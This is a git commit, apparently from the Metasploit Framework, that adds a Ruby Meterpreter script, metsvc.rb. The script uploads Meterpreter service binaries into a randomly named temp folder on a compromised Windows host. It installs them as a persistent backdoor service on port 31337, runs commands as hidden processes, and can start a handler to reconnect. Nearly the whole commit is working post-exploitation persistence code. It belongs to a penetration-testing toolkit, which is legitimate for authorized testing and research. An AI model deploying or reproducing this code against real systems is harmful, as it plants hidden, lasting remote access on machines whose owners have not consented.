Add the metsvc script

git-svn-id: file:///home/svn/framework3/trunk@7215 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-10-20 19:36:19 +00:00 · 2009-10-20 19:36:19 +00:00 · fdda743d71
commit fdda743d71
parent 8325b46694
1 changed files with 119 additions and 0 deletions
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@ -0,0 +1,119 @@
+#!/usr/bin/env ruby
+
+#
+# Meterpreter script for installing the meterpreter service
+#
+
+session = client
+
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+	"-h"  => [ false,  "This help menu"],
+	"-r"  => [ false,  "Uninstall an existing Meterpreter service (files must be deleted manually)"],
+	"-A"  => [ false,  "Automatically start a matching multi/handler to connect to the service"],
+
+)
+
+# Exec a command and return the results
+def m_exec(session, cmd)
+	r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
+	b = ""
+	while(d = r.channel.read)
+		b << d
+	end
+	r.channel.close			
+	r.close
+	b
+end
+
+#
+# Default parameters
+#
+
+based    = File.join(Msf::Config.install_root, "data", "meterpreter")
+rport    = 31337
+install  = false
+autoconn = false
+remove   = false
+
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+	case opt
+	when "-h"
+		print_status(opts.usage)
+		return
+	when "-A"
+		autoconn = true
+	when "-r"
+		remove = true		
+	end
+end
+
+#
+# Create the persistent VBS
+#
+
+if(not remove)
+	print_status("Creating a meterpreter service on port #{rport}")
+else
+	print_status("Removing the existing Meterpreter service")
+end
+
+#
+# Upload to the filesystem
+#
+
+tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
+
+print_status("Creating a temporary installation directory #{tempdir}...")
+client.fs.dir.mkdir(tempdir)
+
+%W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
+	next if (bin != "metsvc.exe" and remove)
+	print_status(" >> Uploading #{bin}...")	
+	fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
+	fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
+	fd.close
+end
+
+#
+# Execute the agent
+#
+if(not remove)
+	print_status("Starting the service...")
+	client.fs.dir.chdir(tempdir)
+	data = m_exec(client, "metsvc.exe install-service")
+	print_status("\t#{data}")
+else
+	print_status("Stopping the service...")
+	client.fs.dir.chdir(tempdir)
+	data = m_exec(client, "metsvc.exe remove-service")
+	print_status("\t#{data}")
+end
+
+if(remove)
+	m_exec(client, "cmd.exe /c del metsvc.exe")
+end
+
+#
+# Setup the multi/handler if requested
+#
+if(autoconn)
+	print_status("Trying to connect to the Meterpreter service at #{client.tunnel_peer.split(':')[0]}:#{rport}...")
+	mul = client.framework.exploits.create("multi/handler")
+	mul.datastore['PAYLOAD'] = "windows/metsvc_reverse_tcp"
+	mul.datastore['LPORT']   = rport
+	mul.datastore['RHOST']   = client.tunnel_peer.split(':')[0]
+	mul.datastore['ExitOnSession'] = false	
+	mul.exploit_simple(
+		'Payload'        => mul.datastore['PAYLOAD'],
+		'RunAsJob'       => true
+	)
+end
+
+